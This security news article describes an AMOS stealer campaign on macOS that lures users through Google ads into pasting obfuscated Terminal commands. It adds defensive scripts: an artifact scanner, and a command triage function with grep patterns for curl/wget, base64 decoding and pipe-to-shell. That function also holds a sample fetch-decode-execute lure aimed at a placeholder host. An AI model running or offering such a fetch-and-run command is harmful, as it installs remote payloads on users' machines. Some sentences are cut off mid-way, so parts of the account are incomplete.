Google Search Results Deliver AMOS Stealer Malware to Mac Users
Mac users are currently compromising their own systems through a clever mix of Google Ads and malicious Terminal commands. This latest AMOS stealer campaign—often tracked as "SOMA"—was identified by security researchers Olena of Clario and Vladyslav Kolchin. It isn’t just a technical exploit; it’s a trap that preys on a user's willingness to follow technical guides to solve everyday problems.
docs.google.com, business.google.com, or medium.com. Because they appear as paid advertisements on trusted domains, they gain a level of trust that encourages clicks from unsuspecting users.
Execution via Social Engineering and Terminal Exploits
AMOS succeeds by turning macOS's strengths against itself. Once a user clicks a malicious search result, they are directed to a page, often a fake guide on Medium, that instructs them to copy and paste a specific command into the Terminal. This command is heavily obfuscated with Base64 encoding to hide its true intent from both the user and basic security scanners.
curl command. This is where the trick happens. By using curl to fetch payloads from a remote server, the malware sidesteps the macOS quarantine attribute entirely. Unlike files downloaded through a browser, which trigger Gatekeeper warnings, these payloads arrive without the metadata that usually alerts the system to an external origin. The malware then uses ad hoc signatures to run its malicious binaries once the user has been manipulated into providing administrative consent.
Data Exfiltration and System Impact
Once it gains a foothold, AMOS moves fast. The malware immediately begins cloning the entire contents of the user’s Documents folder into a hidden directory named "FileGrabber." It also aggressively targets the macOS Notes application, seeking to exfiltrate private entries and sensitive information tucked away in the app.
To stay on the system, the malware writes several hidden files to the top level of the user's Home folder:
- .agent: An AppleScript that manages the theft process.
- .mainHelper: The primary Mach-O binary used for malicious operations.
- .pass: A file containing the user's password stored in plain text.
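As an added example, not code from the article or from the researchers who identified the campaign, the following POSIX shell script checks a home directory for the artifact names the article lists and reports a plaintext .pass file as a credential exposure. The names .agent, .mainHelper, .pass and FileGrabber come from the article; the exact location of the FileGrabber directory is an assumption, so both a hidden and a plain name at the top of the home folder are checked. A second helper shows how a defender can confirm whether a downloaded file carries the com.apple.quarantine attribute that a curl download never receives; it only does anything on macOS.

```shell
#!/bin/sh
# Added example, not code from the article or the researchers: check a home
# directory for the artifacts the article attributes to this AMOS campaign.
# The names .agent, .mainHelper, .pass and FileGrabber come from the article;
# where FileGrabber sits is an assumption (both a hidden and a plain name at
# the top of the home folder are checked).

# scan_home DIR
#   Prints one line per artifact found; returns 0 if nothing was found,
#   1 if at least one artifact exists (so it can drive an alert).
scan_home() {
    dir="$1"
    found=0
    for name in .agent .mainHelper .pass FileGrabber .FileGrabber; do
        if [ -e "$dir/$name" ]; then
            echo "SUSPICIOUS: $dir/$name"
            found=1
        fi
    done
    # .pass is described as a plaintext copy of the user's password, so its
    # presence means the credential should be treated as already exposed.
    if [ -f "$dir/.pass" ]; then
        echo "CREDENTIAL EXPOSURE: $dir/.pass present; rotate the account password"
    fi
    return "$found"
}

# quarantine_state FILE
#   On macOS, prints "tagged" when the file carries com.apple.quarantine
#   (what a browser download gets and a curl download does not) and
#   "untagged" otherwise. On systems without xattr it just says so.
quarantine_state() {
    if command -v xattr >/dev/null 2>&1; then
        if xattr -p com.apple.quarantine "$1" >/dev/null 2>&1; then
            echo tagged
        else
            echo untagged
        fi
    else
        echo "xattr unavailable on this platform"
    fi
}

# Usage: scan_home "$HOME" && echo "no AMOS artifacts found"
```

Run scan_home against the real home folder of a machine under investigation; a non-zero exit means at least one of the listed artifacts exists, and the CREDENTIAL EXPOSURE line means the password rotation should happen before any cleanup.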
During the infection, users typically see legitimate system prompts asking for access to private data folders or apps. Granting these permissions is the final step that allows the exfiltration to proceed. Security analysis indicates that by the time these prompts appear, some sensitive data has often already been compromised.
Bypassing macOS Security Protections
The effectiveness of the AMOS campaign lies in its ability to render technical safeguards irrelevant. Modern macOS security is built to stop unauthorized code, but it is powerless when a user manually types the instructions. By convincing you to open the door yourself, the attackers make the system's native protections look the other way.
curl command in a suggested script from an unfamiliar source, treat it as a significant red flag.
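An added example, not part of the article: a small POSIX shell function that inspects the text of a command before anyone pastes it into Terminal, flagging the traits the article associates with this lure (a curl or wget fetch, Base64 decoding at run time, piping into a shell, and a request for admin rights or an AppleScript run). The sample lure string below uses the placeholder host example.invalid and is constructed for the demonstration; nothing in the function executes the command.

```shell
#!/bin/sh
# Added example, not from the article: triage a command someone is about to
# paste into Terminal by scoring the traits the article ties to the AMOS
# lure. The command text is only inspected, never run.

# triage_command 'COMMAND TEXT'
#   Prints one line per trait found plus a summary line, returns 0 when no
#   trait matches and 1 when at least one does.
triage_command() {
    cmd="$1"
    hits=0
    # Remote fetch: content pulled with curl/wget never gets the quarantine tag
    # that a browser download would carry.
    if printf '%s' "$cmd" | grep -Eq '(^|[^[:alnum:]])(curl|wget)([^[:alnum:]]|$)'; then
        echo "remote fetch: command downloads content with curl/wget"
        hits=$((hits + 1))
    fi
    # Obfuscation: a Base64 blob decoded at run time hides the real payload.
    if printf '%s' "$cmd" | grep -Eq 'base64[[:space:]]+(-d|-D|--decode)'; then
        echo "obfuscation: Base64-encoded payload is decoded at run time"
        hits=$((hits + 1))
    fi
    # Pipe-to-shell or eval: whatever was fetched or decoded runs immediately.
    if printf '%s' "$cmd" | grep -Eq '\|[[:space:]]*(sh|bash|zsh)([^[:alnum:]]|$)|(^|[^[:alnum:]])eval[[:space:]]'; then
        echo "pipe-to-shell: downloaded or decoded text is executed directly"
        hits=$((hits + 1))
    fi
    # Consent/privilege: sudo prompts for the admin password; osascript can
    # drive the AppleScript component the article describes.
    if printf '%s' "$cmd" | grep -Eq '(^|[^[:alnum:]])(sudo|osascript)([^[:alnum:]]|$)'; then
        echo "privilege/consent: command asks for admin rights or runs AppleScript"
        hits=$((hits + 1))
    fi
    echo "traits matched: $hits"
    [ "$hits" -eq 0 ]
}

# Constructed sample lure (placeholder host, not a real campaign command).
SAMPLE_LURE='curl -s https://example.invalid/setup | base64 --decode | sh'

# Usage: triage_command "$SAMPLE_LURE" || echo "do not paste this"
```

Any single trait is worth pausing over; the combination the article describes (fetch, decode, pipe to a shell, then a password prompt) scores three or four and should be treated as a stop sign rather than a how-to step.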